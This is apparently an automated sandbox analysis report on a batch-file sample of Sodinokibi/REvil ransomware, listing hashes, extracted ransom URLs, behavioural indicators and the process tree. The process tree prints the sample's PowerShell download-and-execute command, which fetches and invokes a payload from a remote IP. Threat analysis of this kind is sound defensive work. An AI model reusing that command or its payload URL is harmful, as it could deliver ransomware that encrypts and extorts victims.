Analysis
- max time kernel: 149s
- max time network: 152s
- platform: windows10_x64
- resource: win10v200722
- submitted: 14-09-2020 20:10
Static task: static1
Behavioral task: behavioral1
  Sample: 57948d7f2e776c683d1bec54a461ce1d.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 57948d7f2e776c683d1bec54a461ce1d.bat
  Resource: win10v200722
General
- Target: 57948d7f2e776c683d1bec54a461ce1d.bat
- Size: 220B
- MD5: f639a0fd02a603ce76b6024956fdc25b
- SHA1: 783590b7e2a89acb69468ac3ece79f3bcf9b6137
- SHA256: 63c63bb4f93c338d10395291b9b6255eb0d16250de46491f572a20284da5a007
- SHA512: 7ff6c69a22632f4adc6dae824d095714bebbe45023f7a961c293a0faa472063b8965c183442977ba54453154d02dade43d2d7c3dd2234bf97e27b1422e81e4bb
Malware Config
- Extracted: http://185.103.242.78/pastes/57948d7f2e776c683d1bec54a461ce1d
- Extracted: C:\37fj7cqpj9-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/54CD3F1033C33A4E
    http://decryptor.cc/54CD3F1033C33A4E
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (118 IoCs)
  Processes: powershell.exe
  flow | pid | process
  16 | 2584 | powershell.exe
  24 | 2584 | powershell.exe
  26 | 2584 | powershell.exe
  28 | 2584 | powershell.exe
  30 | 2584 | powershell.exe
  32 | 2584 | powershell.exe
  34 | 2584 | powershell.exe
  36 | 2584 | powershell.exe
  39 | 2584 | powershell.exe
  41 | 2584 | powershell.exe
  43 | 2584 | powershell.exe
  45 | 2584 | powershell.exe
  47 | 2584 | powershell.exe
  49 | 2584 | powershell.exe
  51 | 2584 | powershell.exe
  53 | 2584 | powershell.exe
  55 | 2584 | powershell.exe
  57 | 2584 | powershell.exe
  59 | 2584 | powershell.exe
  61 | 2584 | powershell.exe
  63 | 2584 | powershell.exe
  65 | 2584 | powershell.exe
  67 | 2584 | powershell.exe
  69 | 2584 | powershell.exe
  71 | 2584 | powershell.exe
  73 | 2584 | powershell.exe
  75 | 2584 | powershell.exe
  77 | 2584 | powershell.exe
  80 | 2584 | powershell.exe
  82 | 2584 | powershell.exe
  84 | 2584 | powershell.exe
  86 | 2584 | powershell.exe
  88 | 2584 | powershell.exe
  90 | 2584 | powershell.exe
  92 | 2584 | powershell.exe
  94 | 2584 | powershell.exe
  96 | 2584 | powershell.exe
  98 | 2584 | powershell.exe
  100 | 2584 | powershell.exe
  102 | 2584 | powershell.exe
  104 | 2584 | powershell.exe
  106 | 2584 | powershell.exe
  108 | 2584 | powershell.exe
  110 | 2584 | powershell.exe
  112 | 2584 | powershell.exe
  113 | 2584 | powershell.exe
  114 | 2584 | powershell.exe
  115 | 2584 | powershell.exe
  117 | 2584 | powershell.exe
  119 | 2584 | powershell.exe
  121 | 2584 | powershell.exe
  123 | 2584 | powershell.exe
  125 | 2584 | powershell.exe
  127 | 2584 | powershell.exe
  129 | 2584 | powershell.exe
  131 | 2584 | powershell.exe
  133 | 2584 | powershell.exe
  135 | 2584 | powershell.exe
  137 | 2584 | powershell.exe
  139 | 2584 | powershell.exe
  141 | 2584 | powershell.exe
  143 | 2584 | powershell.exe
  145 | 2584 | powershell.exe
  147 | 2584 | powershell.exe
- Modifies extensions of user files (8 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\users\admin\pictures\OpenEdit.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\BackupReceive.tif => \??\c:\users\admin\pictures\BackupReceive.tif.37fj7cqpj9 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\GetRegister.png => \??\c:\users\admin\pictures\GetRegister.png.37fj7cqpj9 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\MeasureResolve.png => \??\c:\users\admin\pictures\MeasureResolve.png.37fj7cqpj9 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\OpenDisconnect.crw => \??\c:\users\admin\pictures\OpenDisconnect.crw.37fj7cqpj9 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\PushConvert.png => \??\c:\users\admin\pictures\PushConvert.png.37fj7cqpj9 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\OpenEdit.tiff => \??\c:\users\admin\pictures\OpenEdit.tiff.37fj7cqpj9 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\StepComplete.tif => \??\c:\users\admin\pictures\StepComplete.tif.37fj7cqpj9 | powershell.exe
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: powershell.exe
  description | ioc | process
  File opened (read-only) | \??\W: | powershell.exe
  File opened (read-only) | \??\Z: | powershell.exe
  File opened (read-only) | \??\A: | powershell.exe
  File opened (read-only) | \??\B: | powershell.exe
  File opened (read-only) | \??\R: | powershell.exe
  File opened (read-only) | \??\S: | powershell.exe
  File opened (read-only) | \??\U: | powershell.exe
  File opened (read-only) | \??\V: | powershell.exe
  File opened (read-only) | \??\H: | powershell.exe
  File opened (read-only) | \??\I: | powershell.exe
  File opened (read-only) | \??\K: | powershell.exe
  File opened (read-only) | \??\M: | powershell.exe
  File opened (read-only) | \??\N: | powershell.exe
  File opened (read-only) | \??\Q: | powershell.exe
  File opened (read-only) | \??\E: | powershell.exe
  File opened (read-only) | \??\G: | powershell.exe
  File opened (read-only) | \??\J: | powershell.exe
  File opened (read-only) | \??\L: | powershell.exe
  File opened (read-only) | \??\D: | powershell.exe
  File opened (read-only) | \??\F: | powershell.exe
  File opened (read-only) | \??\O: | powershell.exe
  File opened (read-only) | \??\P: | powershell.exe
  File opened (read-only) | \??\T: | powershell.exe
  File opened (read-only) | \??\X: | powershell.exe
  File opened (read-only) | \??\Y: | powershell.exe
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f47f.bmp" | powershell.exe
- Drops file in Program Files directory (33 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\program files\GetRename.mht | powershell.exe
  File opened for modification | \??\c:\program files\PublishGroup.dib | powershell.exe
  File created | \??\c:\program files\37fj7cqpj9-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\DenySend.emf | powershell.exe
  File opened for modification | \??\c:\program files\ExpandMerge.emz | powershell.exe
  File opened for modification | \??\c:\program files\RevokeRepair.ini | powershell.exe
  File opened for modification | \??\c:\program files\UnregisterPop.odp | powershell.exe
  File opened for modification | \??\c:\program files\WriteDisable.js | powershell.exe
  File opened for modification | \??\c:\program files\ExpandMerge.emf | powershell.exe
  File opened for modification | \??\c:\program files\ResizeCompress.inf | powershell.exe
  File opened for modification | \??\c:\program files\RevokeUnprotect.shtml | powershell.exe
  File opened for modification | \??\c:\program files\SplitCheckpoint.dwfx | powershell.exe
  File opened for modification | \??\c:\program files\SyncUnpublish.fon | powershell.exe
  File opened for modification | \??\c:\program files\ReadRestart.dib | powershell.exe
  File opened for modification | \??\c:\program files\ReadStop.ini | powershell.exe
  File opened for modification | \??\c:\program files\SetMove.pcx | powershell.exe
  File opened for modification | \??\c:\program files\SuspendExpand.asx | powershell.exe
  File opened for modification | \??\c:\program files\WatchPublish.rtf | powershell.exe
  File opened for modification | \??\c:\program files\WritePublish.jfif | powershell.exe
  File opened for modification | \??\c:\program files\CompareComplete.ttf | powershell.exe
  File opened for modification | \??\c:\program files\RevokeSearch.mpv2 | powershell.exe
  File opened for modification | \??\c:\program files\StartRestart.pub | powershell.exe
  File opened for modification | \??\c:\program files\TraceCheckpoint.mp2 | powershell.exe
  File opened for modification | \??\c:\program files\UnblockFormat.fon | powershell.exe
  File opened for modification | \??\c:\program files\ConfirmReceive.pdf | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromJoin.wps | powershell.exe
  File opened for modification | \??\c:\program files\InitializeDebug.xltx | powershell.exe
  File opened for modification | \??\c:\program files\SubmitRequest.vssx | powershell.exe
  File opened for modification | \??\c:\program files\WatchPublish.midi | powershell.exe
  File created | \??\c:\program files (x86)\37fj7cqpj9-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\RepairTest.wpl | powershell.exe
  File opened for modification | \??\c:\program files\ResetRedo.dotx | powershell.exe
  File opened for modification | \??\c:\program files\TestSave.vsdx | powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: powershell.exe
  pid | process
  2584 | powershell.exe
  2584 | powershell.exe
  2584 | powershell.exe
  2584 | powershell.exe
  2584 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 2584 | powershell.exe
  Token: SeDebugPrivilege | 2584 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 2584 | powershell.exe
  Token: SeBackupPrivilege | 3944 | vssvc.exe
  Token: SeRestorePrivilege | 3944 | vssvc.exe
  Token: SeAuditPrivilege | 3944 | vssvc.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe
  description | pid | process | target process
  PID 3056 wrote to memory of 2584 | 3056 | cmd.exe | powershell.exe
  PID 3056 wrote to memory of 2584 | 3056 | cmd.exe | powershell.exe
  PID 3056 wrote to memory of 2584 | 3056 | cmd.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\57948d7f2e776c683d1bec54a461ce1d.bat"
  PID: 3056
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/57948d7f2e776c683d1bec54a461ce1d');Invoke-PIVMPOWJJSPSJ;Start-Sleep -s 10000"
    PID: 2584
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 3944
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken